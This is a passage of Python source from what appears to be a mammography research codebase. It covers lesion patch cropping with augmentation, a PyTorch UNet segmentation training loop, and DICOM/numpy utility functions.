size_lower, size_upper = self.size_range
labeled_mask_array = measure.label(mask_array, connectivity=2)
# the number of mass the image contains
self.n_lesions = np.max(labeled_mask_array)
scales = []
lesion_masks = []
for i in range(1, self.n_lesions + 1):
# generate a mask image that only contains one connected component
cur_label = (labeled_mask_array == i).astype(np.uint8) * 255
corner_resize, center_resize = generate_maskinfo(cur_label)
# get lesion size
edge_ratio = get_lesion_size_ratio(corner_resize, (self.patch_size, self.patch_size))
# find scale
            total_scales = sorted([1] + list(self.upscales) + list(self.downscales))
scale = 0
if edge_ratio * min(total_scales) > size_upper:
scale = min(total_scales)
elif edge_ratio * max(total_scales) < size_lower:
scale = max(total_scales)
else:
for scale in total_scales:
if size_lower <= edge_ratio * scale <= size_upper:
break
scales.append(scale)
lesion_masks.append(cur_label)
assert np.all(scales), 'Some scale is zero {}'.format(scales)
return lesion_masks, scales
def get_crop_center_and_size_from_mask(self, labeled_mask_array):
"""Get center and size of lesion from binary mask
Args:
labeled_mask_array: binary array with only one connected component in it
Returns:
crop_center, crop_size
"""
corners, centers = generate_maskinfo(labeled_mask_array)
xmin, ymin, xmax, ymax = corners
crop_size = (xmax - xmin, ymax - ymin)
crop_center = centers
return crop_center, crop_size
def write_arrays(self, image_sample, output_dir, name, lesion_idx, aug_idx, scale, label_sample=None):
if not os.path.isdir(os.path.join(output_dir, name)):
os.mkdir(os.path.join(output_dir, name))
out_imagepath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_imagepath, image_sample)
if label_sample is not None:
out_labelpath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}_mask.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_labelpath, label_sample)
def crop_by_mask(self, image_array, mask_array):
"""Crop lesion patches according to each connected component in mask_array
Args:
image_array:
mask_array:
Returns:
None
"""
lesion_masks, scales = self.get_lesion_masks_and_scales(mask_array)
for lesion_idx, (lesion_mask, scale) in enumerate(zip(lesion_masks, scales)):
crop_center, crop_size = self.get_crop_center_and_size_from_mask(lesion_mask)
for aug_idx in range(self.n_patches):
aug_param_dict = self.sample_augmentation_param()
patch_shape = np.asarray([self.patch_size / scale, self.patch_size / scale]).astype(np.int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape,
scale=scale, aug_param_dict=aug_param_dict)
patch_mask_array = self.crop_once(lesion_mask, crop_center, patch_shape=patch_shape,
scale=scale, aug_param_dict=aug_param_dict)
# binarize upscaled mask
patch_mask_array = (patch_mask_array > patch_mask_array.max() * 0.5).astype(np.int8) * 255
self.write_arrays(image_sample=patch_image_array, label_sample=patch_mask_array,
output_dir=self.output_dir,
name=self.name, lesion_idx=lesion_idx, aug_idx=aug_idx, scale=scale)
def deploy(self):
image_array, mask_array = self.load_image_arrays()
self.crop_by_mask(image_array, mask_array)
class AugmentedROICropper2D_v2(BaseROICropper2D):
"""Crop augmented ROIs from a single image (and corresponding calc mask).
Crop center randomly sampled from another image (cluster mask).
First concat image and mask into one multi-channel image, then crop as usual.
    Finally split the channels into different images.
Total images = nb_scales * 1 *(1+nb_rotations)*nb_labels
Args:
image_path: str, the path to image
mask_path: str, the path to mask
output_dir: str, the output directory for both images and labels
patch_size: int, size of final patch (square)
max_degree: float, the maximum degree of rotation
max_translation: int, the maximum value of translation
upscales: list of float, if the mass is too small, resize the image with upscales
downscales: list of float, if the mass is too big, resize the image with downscales
size_range: tuple of two floats, lower and upper bound of the ratio of mass_size / patch_size
resize_jitter_range: tuple of two floats, lower and upper bound of the random resizing factor
do_flip: bool, if true, perform random horizontal flip
"""
def __init__(self, image_path, mask_path, output_dir,
patch_size=512, n_patches=1,
max_degree=0, max_translation=0,
upscales=(), downscales=(),
size_range=(np.inf, -np.inf),
resize_jitter_range=(1., 1.),
do_flip=False):
super(AugmentedROICropper2D_v2, self).__init__(image_path=image_path, output_dir=output_dir,
patch_size=patch_size, mask_path=mask_path)
self.do_flip = do_flip
self.max_degree = max_degree
self.max_translation = max_translation
self.resize_jitter_range = resize_jitter_range
self.n_patches = n_patches
self.n_lesions = -1
self.upscales = upscales
self.downscales = downscales
self.size_range = size_range
def load_image_arrays(self):
image_array = cv2.imread(self.image_path, -1)
assert isinstance(self.mask_path, list) and (len(self.mask_path) == 2)
calc_mask_path, cluster_mask_path = self.mask_path
calc_mask_array = cv2.imread(calc_mask_path, -1)
cluster_mask_array = cv2.imread(cluster_mask_path, -1)
assert (len(calc_mask_array.shape) == 2)
assert (len(cluster_mask_array.shape) == 2)
if image_array.shape != calc_mask_array.shape:
print('{} != {}'.format(image_array.shape, calc_mask_array.shape))
calc_mask_array = augmentation.crop_or_pad(calc_mask_array, image_array.shape)
image_array = np.dstack([image_array, calc_mask_array])
mask_array = cluster_mask_array
return image_array, mask_array
def split_image_array(self, image_sample):
assert (len(image_sample.shape) == 3)
assert (image_sample.shape[-1] == 2)
image_sample, label_sample = image_sample[..., 0], image_sample[..., 1]
return image_sample, label_sample
def sample_augmentation_param(self):
"""Sample degree, translation, resize_jitter
From self.max_degree and self.max_translation and self.resize_jitter_range
"""
translation = np.random.randint(-self.max_translation // 2, self.max_translation // 2 + 1, size=2)
degree = random.uniform(-self.max_degree, self.max_degree)
resize_ratio_lower, resize_ratio_upper = self.resize_jitter_range
resize_jitter = random.uniform(resize_ratio_lower, resize_ratio_upper)
is_flip = self.do_flip and (random.uniform(0,1) > 0.5)
aug_param_dict = {}
aug_param_dict['rotate_angle'] = degree
aug_param_dict['translation'] = translation
aug_param_dict['resize_jitter'] = resize_jitter
aug_param_dict['is_flip'] = is_flip
return aug_param_dict
def get_random_crop_center_from_mask(self, mask_array):
"""Get center and size of lesion from binary mask
Args:
mask_array: binary array
Returns:
crop_center
"""
y_list, x_list = np.where(mask_array > 0)
xy_list = list(zip(x_list, y_list))
random_idx = np.random.choice(len(xy_list))
crop_center = xy_list[random_idx]
return crop_center
def write_arrays(self, image_sample, output_dir, name, lesion_idx, aug_idx, scale, label_sample=None):
if not os.path.isdir(os.path.join(output_dir, name)):
os.mkdir(os.path.join(output_dir, name))
out_imagepath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_imagepath, image_sample)
if label_sample is not None:
out_labelpath = os.path.join(
output_dir, name, "{}_{:03d}_{:03d}_scale{:.2f}_mask.png".format(name, lesion_idx + 1, aug_idx, scale))
cv2.imwrite(out_labelpath, label_sample)
def crop_by_mask(self, image_array, mask_array):
"""Crop lesion patches according to each connected component in mask_array
Args:
image_array:
mask_array:
Returns:
None
"""
crop_center = self.get_random_crop_center_from_mask(mask_array)
for aug_idx in range(self.n_patches):
aug_param_dict = self.sample_augmentation_param()
scale = 1.0
patch_shape = np.asarray([self.patch_size / scale, self.patch_size / scale]).astype(np.int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape,
scale=scale, aug_param_dict=aug_param_dict)
patch_image_array, patch_mask_array = self.split_image_array(patch_image_array)
# binarize upscaled mask
patch_mask_array = (patch_mask_array > patch_mask_array.max() * 0.5).astype(np.int8) * 255
self.write_arrays(image_sample=patch_image_array, label_sample=patch_mask_array,
output_dir=self.output_dir,
name=self.name, lesion_idx=0, aug_idx=aug_idx, scale=scale)
def deploy(self):
image_array, mask_array = self.load_image_arrays()
self.crop_by_mask(image_array, mask_array)
if __name__ == "__main__":
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('task', 'pos_crop', 'task name, see the if/elif branches below for the supported values')
# logging.getLogger().setLevel(logging.DEBUG)
def get_dict_from_search_path(image_search_path, label_search_path):
image_pngs = glob2.glob(image_search_path)
label_pngs = glob2.glob(label_search_path)
key_fn = lambda x: os.path.basename(x).split('.')[0].split("_")[0]
image_dict = {key_fn(path): path for path in image_pngs}
label_dict = {key_fn(path): path for path in label_pngs}
return image_dict, label_dict
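# Note on key_fn above (added for clarity): it keys files by the basename up to the first
# '.' and the first '_', so e.g. '11740735-4.dcm.png' and '11740735-4_combined.png' both map
# to the key '11740735-4', which is how images and masks from different folders are paired.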
if FLAGS.task == 'crop_by_bbox':
output_dir = '/data/log/mammo/detection_patches_bbox2/'
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
mask_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_etc/*png"
# NB. Run batch evaluate to generate bbox_dict json first
scale = 1.0
if scale == 1.0:
bbox_dict_path = '/data/log/mammo/detection_patches/bbox_dict_ziwei_scale1.0.json'
pred_search_path = r'/data/log/mammo/mass_train/Mammo_20180502-16h50PM26/eval_model.cpkt-280000-ziwei-scale1.0/*png'
elif scale == 0.5:
bbox_dict_path = '/data/log/mammo/detection_patches/bbox_dict_ziwei_scale0.5.json'
pred_search_path = r'/data/log/mammo/mass_train/Mammo_20180502-16h50PM26/eval_model.cpkt-70000-ziwei-scale0.5/*png'
elif scale == 0.25:
bbox_dict_path = '/data/log/mammo/detection_patches/bbox_dict_ziwei_scale0.25.json'
pred_search_path = r'/data/log/mammo/mass_train/Mammo_20180502-16h50PM26/eval_model.cpkt-90000-ziwei-scale0.25/*png'
# find intersection of two sets of keys
image_dict, label_dict = get_dict_from_search_path(pred_search_path, mask_search_path)
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
# generate cropped images, predictions and masks
for image_search_path, suffix in zip([image_search_path, pred_search_path, mask_search_path],
['_img.png', '_pred.png', '_mask.png']):
image_dict, label_dict = get_dict_from_search_path(image_search_path, mask_search_path)
for key in tqdm(keys[:]):
# for key in ['11740735-4']:
label_path = label_dict[key]
image_path = image_dict[key]
DetectedROICropper2D(image_path, output_dir,
patch_size=512,
mask_path=None,
bbox_dict_path_list=[bbox_dict_path],
scale_list=[scale],
suffix=suffix,
crop_by_bbox_size=True,
bbox_dilation_ratio=4.0, # 4 times the bbox size
bbox_dilation_size=-400,
crop_mode='square').deploy()
elif FLAGS.task == 'crop_by_mask':
output_dir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei_test"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_3456/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:5]):
# for key in ['11737954-1']:
mask_path = label_dict[key]
image_path = image_dict[key]
# label_path = '/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask/11740735-4_combined.png'
# image_path = '/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/11740735-4.dcm.png'
output_dir = '/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/test/'
AugmentedROICropper2D(image_path, mask_path, output_dir,
patch_size=512, n_patches=10,
max_degree=180, max_translation=100,
upscales=[2], downscales=[1 / 2.0, 1 / 4.0, 1 / 8.0],
size_range=[1 / 4, 1 / 2],
resize_jitter_range=[0.75, 1.25],
do_flip=True).deploy()
elif FLAGS.task == 'pos_crop_ziwei':
output_dir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_3456/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
# for key in ['11737954-1']:
label_path = label_dict[key]
image_path = image_dict[key]
info_dict = augment_roi_2D(image_path, label_path, output_dir,
patch_size=512, n_patches=10,
max_degree=180, max_translation=100,
upscales=[1.0], downscales=[1/2.0, 1/4.0, 1/8.0, 1/16.0],
size_list=[100/512, 200/512],
resize_jitter_list=[0.75, 1.25],
do_flip=True,
padding="constant",
key=key)
all_info_dict.append(info_dict.items())
elif FLAGS.task == 'neg_crop':
neg_imagedir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei_neg"
elif FLAGS.task == 'neg_crop_ziwei':
neg_imagedir = r"/data/log/mammo/patches_multiscale_mass_0406_ziwei_neg"
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_etc/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# crop from negative images as well
keys = sorted(list(set(image_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
print(key)
label_path = label_dict.get(key, '')
image_path = image_dict.get(key, '')
generate_negative_sample(image_path, label_path, isrotate=True,key=key,
neg_imagedir=neg_imagedir,
patch_size=512,
ignore_padding=128, # generally keep it as patch_size / 4
n_patches=10,
scale=1.0,
nonezero_threshold=0.75,
resize_jitter_list=[0.75, 1.25])
if FLAGS.task == 'pos_crop_inbreast':
output_dir = r"/data/log/mammo/patches_multiscale_mass_0406_inbreast_pos_small"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
# for key in ['11737954-1']:
label_path = label_dict[key]
image_path = image_dict[key]
info_dict = augment_roi_2D(image_path, label_path, output_dir,
patch_size=512, n_patches=10,
max_degree=180, max_translation=100,
upscales=[1.0], downscales=[1/2.0, 1/4.0, 1/8.0, 1/16.0],
size_list=[50/512, 100/512],
resize_jitter_list=[0.75, 1.25],
do_flip=True,
padding="constant",
key=key)
all_info_dict.append(info_dict.items())
elif FLAGS.task == 'neg_crop_inbreast':
neg_imagedir = r"/data/log/mammo/patches_multiscale_mass_0406_inbreast_neg_scale0.12"
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG_norm_6_6/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# crop from negative images as well
keys = sorted(list(set(image_dict.keys())))
all_info_dict = []
for key in tqdm(keys[:]):
print(key)
label_path = label_dict.get(key, '')
image_path = image_dict.get(key, '')
generate_negative_sample(image_path, label_path, key=key,
neg_imagedir=neg_imagedir,
patch_size=512,
ignore_padding=128, # generally keep it as patch_size / 4
n_patches=10,
scale=0.125,
nonezero_threshold=0.5, # 0.5 for scale [0.125], 0.75 for scales [0.25, 0.5 and 1.0]
resize_jitter_list=[0.75, 1.25])
# all_info_dict.append(info_dict.items())
elif FLAGS.task == 'split_ziwei':
positive_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_ziwei_pos/**/*_mask.png'
negative_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_ziwei_neg_scale1.00/**/*_mask.png'
strata_regex_pattern = 'scale1.00'
positive_dir = positive_patch_search_path.split('*')[0]
negative_dir = negative_patch_search_path.split('*')[0]
output_dir = r'/data/log/mammo/patches_multiscale_mass_0406_ziwei_stratefied/'
stratefied_sampling_neg_and_pos(positive_patch_search_path=positive_patch_search_path,
negative_patch_search_path=negative_patch_search_path,
strata_regex_pattern=strata_regex_pattern,
positive_dir=positive_dir,
negative_dir=negative_dir,
output_dir=output_dir)
elif FLAGS.task == 'split_inbreast':
positive_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_inbreast_pos_small/**/*_mask.png'
negative_patch_search_path = r'/data/log/mammo/patches_multiscale_mass_0406_inbreast_neg_scale0.12/**/*_mask.png'
strata_regex_pattern = 'scale0.12'
positive_dir = positive_patch_search_path.split('*')[0]
negative_dir = negative_patch_search_path.split('*')[0]
output_dir = r'/data/log/mammo/patches_multiscale_mass_0406_inbreast_stratefied_small/'
stratefied_sampling_neg_and_pos(positive_patch_search_path=positive_patch_search_path,
negative_patch_search_path=negative_patch_search_path,
strata_regex_pattern=strata_regex_pattern,
positive_dir=positive_dir,
negative_dir=negative_dir,
output_dir=output_dir)
elif FLAGS.task == 'calc_cluster_crop':
output_dir = r"/data/log/mammo/calc_cluster_crop_affine_pos"
fileio.maybe_make_new_dir(output_dir)
image_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/png/*png"
label_search_path = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/bootstrap_mask_cleaned/*png"
image_dict, label_dict = get_dict_from_search_path(image_search_path, label_search_path)
# find intersection of two sets of keys
keys = sorted(list(set(image_dict.keys()) & set(label_dict.keys())))
# print(keys, image_dict, label_dict)
all_info_dict = []
for key in tqdm(keys[:]):
# for key in ['11737954-1']:
print(key)
# mask_path is [calc_mask_path, cluster_mask_path]
cluster_mask_path = label_dict[key].replace('bootstrap_mask_cleaned', 'calc_cluster_all')
calc_mask_path = label_dict[key]
mask_path = [calc_mask_path, cluster_mask_path]
image_path = image_dict[key]
AugmentedROICropper2D_v2(image_path, mask_path, output_dir,
patch_size=512, n_patches=10,
max_degree=5, max_translation=5,
upscales=[1.], downscales=[1.0],
size_range=[np.inf, -np.inf],
resize_jitter_range=[0.75, 1.25],
do_flip=True).deploy()
<file_sep># Modified for using ynet to seg the skin and classify.
# v0: only unet for skin.
import os
from torch import optim
from time import gmtime, strftime
from tensorboardX import SummaryWriter
os.sys.path.append(r'C:\Users\Xing\Projects\SDFY\mammo\projects\SDFY_project')
from SDFY_project.unet_model.unet_mass_light_v2 import *  # for custom unet
# from SDFY_project.efficientunet.efficientynet import * # for efficientynet
from SDFY_project.unet_factory.unet import *  # for unet factory
from SDFY_project.data_generator_skin_ynet import *
from SDFY_project.tools import *
from lr_cosine import CosineAnnealingWarmUpRestarts
from SDFY_project.sampler import BalancedBatchSampler
from SDFY_project.losses import dice_loss
from SDFY_project.Unet_metrics.unet_metircs import *
from SDFY_project.auto_augment.auto_augment import AutoAugment, Cutout
import warnings
warnings.filterwarnings(action='ignore')
if __name__ == '__main__':
time_string = strftime("%a%d%b%Y-%H%M%S", gmtime())
# result_path = r'E:\Data\HeronTech\SDFY\ori_marigin_crop\model_train'
result_path = r'E:\Xing\SDFY_skin\Train_log'
descrip = 'July20_resunext50_light_384_imgaug'
model_save_path = os.path.join(result_path, descrip, time_string, 'save')
tb_save_path = os.path.join(result_path, descrip,time_string, 'tb')
os.makedirs(model_save_path)
os.makedirs(tb_save_path)
writer = SummaryWriter(log_dir=tb_save_path)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
# torch.cuda.set_device(1)
# model = get_unetx_reduce_fpn_v1().cuda()
# model = resnet.resnet10(in_channels=8, drop_rate=0.3, sample_size=64, sample_duration=16, shortcut_type='B', num_classes=1).cuda()
# model = resnet_v2.resnet10(in_channels=8, drop_rate=0.3, sample_size=64, sample_duration=16, shortcut_type='B',
# num_classes=1).cuda()
num_classes = 1
# model = ResNet(dataset='calc', depth=50, num_classes=num_classes).cuda()
# model = UNet(n_channels=3,n_classes=num_classes,height=384,width=384).cuda()
# model = get_efficientynet_b0(out_channels=1, n_classes=num_classes, concat_input=True, pretrained=True).cuda()
model = unet_resnet(resnet_type='resnext50_32x4d',in_channels=3,out_channels=1).cuda()
# os.environ["CUDA_VISIBLE_DEVICES"] = '0,1'
# if torch.cuda.device_count()>1:
# model = nn.DataParallel(model).cuda()
criterion = nn.BCELoss().cuda()
# criterion = nn.NLLLoss()
# criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=1e-8, betas=(0.9, 0.999), eps=1e-08, weight_decay=1e-5)
#scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', patience=10, threshold=0.01, factor=0.3)
scheduler = CosineAnnealingWarmUpRestarts(optimizer, T_0=10, T_mult=2, eta_max=1e-3, T_up=1, gamma=0.5)
train_transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
AutoAugment(),
transforms.ToTensor()
])
trainconfig = {"dataset": 'mammo_calc',"subset": '0'}
train_config = dataconfig(**trainconfig)
# training_data = DataGenerator(train_config,transform= train_transform)
training_data = DataGenerator(train_config, transform= transforms.ToTensor())
# train_loader = DataLoader(training_data, num_workers=4, batch_size=16, shuffle= True)
train_loader = DataLoader(training_data,num_workers=4,
sampler=BalancedBatchSampler(training_data, type='single_label'),
batch_size = 6, drop_last= True)
valconfig = {"dataset": "calc","subset": '1'}
val_config = dataconfig(**valconfig)
validation_data = DataGenerator(val_config,transform= transforms.ToTensor())
val_loader = DataLoader(validation_data, num_workers=4,shuffle=True)
print('data loader finished')
Train_C_flag = False
epoch_len = 200
bst_acc = 0
bst_loss = 1e10
bst_tsh = 0.1
if Train_C_flag == True:
model_load_path = r'E:\Xing\mass0508\Train_log\June12_ynet_light_bridgel\Fri12Jun2020-204633\save'
model_name = r'\best_model.pth'
checkpoint = torch.load(model_load_path + model_name)
model.load_state_dict(checkpoint['state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer'])
Epoch = checkpoint['epoch']
else:
Epoch = 0
for epoch in range(Epoch,Epoch+epoch_len):
model.train()
losses = AverageMeter()
losses_dice = AverageMeter()
losses_cls = AverageMeter()
accuracies = AverageMeter()
for i, (images,masks,labels) in enumerate(train_loader):
targets = labels.cuda()
masks = masks.cuda()
est_maps = model(images.cuda())
# print('outputs: ', outputs.data.cpu().numpy().tolist(), 'targets: ', targets.data.cpu().numpy().tolist())
est_maps = F.sigmoid(est_maps)
est_tags = torch.ones(labels.shape[0]).cuda()
loss_dice = dice_loss(est_maps, masks)
loss_cls = criterion(est_maps,masks)
loss = 0.5*loss_dice + 0.5*loss_cls
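# NB (clarifying comment): in this v0 "unet only" version there is no classification head,
# so both loss terms are computed on the segmentation maps (dice + BCE against the masks),
# and est_tags below are dummy all-ones tags used only by the accuracy metric.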
acc = calculate_accuracy_binary(est_tags, targets)
losses.update(loss.item(), targets.size(0))
losses_dice.update(loss_dice.item(), targets.size(0))
losses_cls.update(loss_cls.item(), targets.size(0))
accuracies.update(acc, targets.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
if len(est_maps.shape) >3:
est_maps = torch.squeeze(est_maps,1)
if (epoch) % 50==0 and i % 20 == 0:
# _, predict = torch.max(est_tags, 1)
predict = est_tags
add_image_3d(images, predict, targets, writer, subset='train', epoch=epoch, name= str(i)+'_image')
add_image_3d(torch.unsqueeze(masks,1), predict, targets, writer, subset='train', epoch=epoch,name = str(i)+'_masks')
add_image_3d(torch.unsqueeze(est_maps,1), predict, targets, writer, subset='train', epoch=epoch,name = str(i)+'_est_maps')
#print(i,loss)
losses_val = AverageMeter()
losses_val_dice = AverageMeter()
losses_val_cls = AverageMeter()
accuracies_val = AverageMeter()
model.eval()
with torch.no_grad():
for j, (inputs_val,masks_val, targets_val) in enumerate(val_loader):
targets_val = targets_val.cuda()
masks_val = masks_val.cuda()
outputs_val = model(inputs_val.cuda())
outputs_val = F.sigmoid(outputs_val)
est_tags_val = torch.ones(targets_val.shape[0]).cuda()
loss_dice_val = dice_loss(outputs_val, masks_val)
loss_cls_val = criterion(outputs_val, masks_val)
loss_val = 0.5*loss_dice_val + 0.5*loss_cls_val
acc_val = calculate_accuracy_binary(est_tags_val, targets_val)
losses_val.update(loss_val.item(), targets_val.size(0))
losses_val_dice.update(loss_dice_val.item(), targets_val.size(0))
losses_val_cls.update(loss_cls_val.item(), targets_val.size(0))
accuracies_val.update(acc_val, targets_val.size(0))
if len(outputs_val.shape) > 3:
outputs_val = torch.squeeze(outputs_val,1)
if (epoch ) % 20 == 0 and j % 10 == 0:
print(j, loss_val)
# _,predict = torch.max(est_tags_val,1)
predict = est_tags_val
add_image_3d(inputs_val, predict, targets_val, writer, subset='val', epoch=epoch, name = str(j)+'_images')
add_image_3d(torch.unsqueeze(masks_val,1), predict, targets_val, writer, subset='val', epoch=epoch, name = str(j)+'_masks')
add_image_3d(torch.unsqueeze(outputs_val,1), predict, targets_val, writer, subset='val', epoch=epoch, name = str(j)+'_est_maps')
# scheduler.step(losses_val.avg)
scheduler.step()
print('epoch: ', epoch+1, 'train_loss: ', losses.avg, 'train_acc: ', accuracies.avg,
'val_loss: ', losses_val.avg, 'val_acc: ', accuracies_val.avg)
# if bst_loss >= losses_val.avg or abs(bst_loss - losses_val.avg)<=bst_tsh:
if bst_loss >= losses_val.avg:
# if bst_acc <= accuracies_val.avg:
save_file_path = os.path.join(model_save_path, 'best_model.pth')
states = {'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict()}
torch.save(states, save_file_path)
better_epoch = epoch
bst_acc = accuracies_val.avg
bst_loss = losses_val.avg
print('better model found at epoch {} with val_loss {} and val_acc {}'.format(better_epoch,bst_loss,bst_acc))
# Log losses and learning rate to TensorBoard
writer.add_scalars('loss/epoch',
{'train loss': losses.avg, 'validation loss': losses_val.avg,
'train dice loss':losses_dice.avg,'valid dice loss':losses_val_dice.avg,
'train cls loss':losses_cls.avg,'valid cls loss':losses_val_cls.avg,}, epoch + 1)
# writer.add_scalars('acc/epoch',
# {'train accuracy': accuracies.avg, 'validation accuracy': accuracies_val.avg}, epoch + 1)
writer.add_scalars('Learning Rate/epoch',
{'train accuracy': optimizer.param_groups[0]['lr']}, epoch + 1)
# if (epoch + 1) % 10 == 0:
# save_file_path = os.path.join(model_save_path, 'save_{}.pth'.format(epoch+1))
# states = {'epoch': epoch + 1, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict()}
# torch.save(states, save_file_path)
# if (epoch + 1) % 50 == 0:
# add_image(inputs, outputs, targets, names, writer, subset='train', epoch=epoch + 1)
<file_sep>"""This file contains utility functions used for numpy data manipulation"""
import json
import logging
try:
import dicom
except:
import pydicom as dicom
import matplotlib.pylab as plt
import numpy as np
import pandas as pd
import os
import SimpleITK as sitk
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
class NumpyEncoder(json.JSONEncoder):
"""This is a Encoder used to dump numpy arrays to json files.
It also converts np.int64 (not python serializable) to python int
Example:
a = np.array([1, 2, 3])
print(json.dumps({'aa': [2, (2, 3, 4), a], 'bb': [2]}, cls=NumpyEncoder))
Output:
{"aa": [2, [2, 3, 4], [1, 2, 3]], "bb": [2]}
"""
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, np.integer):
return int(obj)
if isinstance(obj, np.float32) or isinstance(obj, np.float16):
return float(obj)
return json.JSONEncoder.default(self, obj)
def convert_to_unit8(pixel_array, from_bit=16, to_bit=8):
"""
Convert a pixel array from `from_bit` to `to_bit` bit depth (currently only 8-bit output is supported)
Args:
pixel_array: a numpy array
from_bit: bit to convert from
to_bit: bit to convert to
Returns:
pixel_array: a converted pixel_array
"""
if from_bit == to_bit:
return pixel_array
# TODO: this is not exact: a full-range mapping would scale by (2**to_bit - 1) / (2**from_bit - 1)
# instead of shifting by a power of two
pixel_array = pixel_array * (2 ** (to_bit - from_bit))
if to_bit == 8:
pixel_array = pixel_array.astype(np.uint8)
else:
raise ValueError('Unsupported bit type {}-bit!'.format(to_bit))
return pixel_array
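# Editor's sketch (not part of the original pipeline): the exact full-range bit-depth mapping
# mentioned in the TODO above would scale by (2**to_bit - 1) / (2**from_bit - 1) rather than
# by a power of two. The helper name below is hypothetical and nothing in this repo calls it.
def convert_bit_depth_exact_sketch(pixel_array, from_bit=16, to_bit=8):
    """Illustrative full-range bit-depth conversion (assumes unsigned integer input)."""
    scale = (2 ** to_bit - 1) / float(2 ** from_bit - 1)
    converted = np.round(pixel_array.astype(np.float64) * scale)
    return converted.astype(np.uint8 if to_bit == 8 else np.uint16)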
def get_new_dimensions(orig_shapes, min_dimension, max_dimension):
"""Get new dimensions based on the target shape limits
The output size can be described by two cases:
1. If the image can be rescaled so its minimum dimension is equal to the
provided value without the other dimension exceeding max_dimension,
then do so.
2. Otherwise, resize so the largest dimension is equal to max_dimension.
Args:
orig_shapes:
min_dimension:
max_dimension:
Returns:
new_shapes: a tuple of new dimensions
"""
min_target = min(orig_shapes)
max_target = max(orig_shapes)
if max_target * min_dimension / min_target < max_dimension:
ratio = min_dimension / min_target
else:
ratio = max_dimension / max_target
new_shapes = tuple(int(shape * ratio) for shape in orig_shapes)
return new_shapes
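# Editor's example (illustrative only, not called anywhere): how get_new_dimensions resolves
# the two cases described in its docstring. The concrete shapes and limits are hypothetical.
def _example_get_new_dimensions():
    # Case 1: (3000, 4000) with min_dimension=800, max_dimension=1333: scaling the short side
    # to 800 keeps the long side under 1333, so ratio = 800 / 3000 and the result is roughly (800, 1066).
    case1 = get_new_dimensions((3000, 4000), min_dimension=800, max_dimension=1333)
    # Case 2: (500, 4000) with the same limits: scaling the short side to 800 would push the
    # long side past 1333, so ratio = 1333 / 4000 and the result is roughly (166, 1333).
    case2 = get_new_dimensions((500, 4000), min_dimension=800, max_dimension=1333)
    return case1, case2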
def get_pixel_array_from_dicom_path(filepath, mismatch=1, to_bit=8, floor=None, ceiling=None):
"""
Read image from dicom file and convert to numpy array.
Args:
filepath: dicom filepath
mismatch: number of pixels to drop in pixel_array in case of a shape mismatch
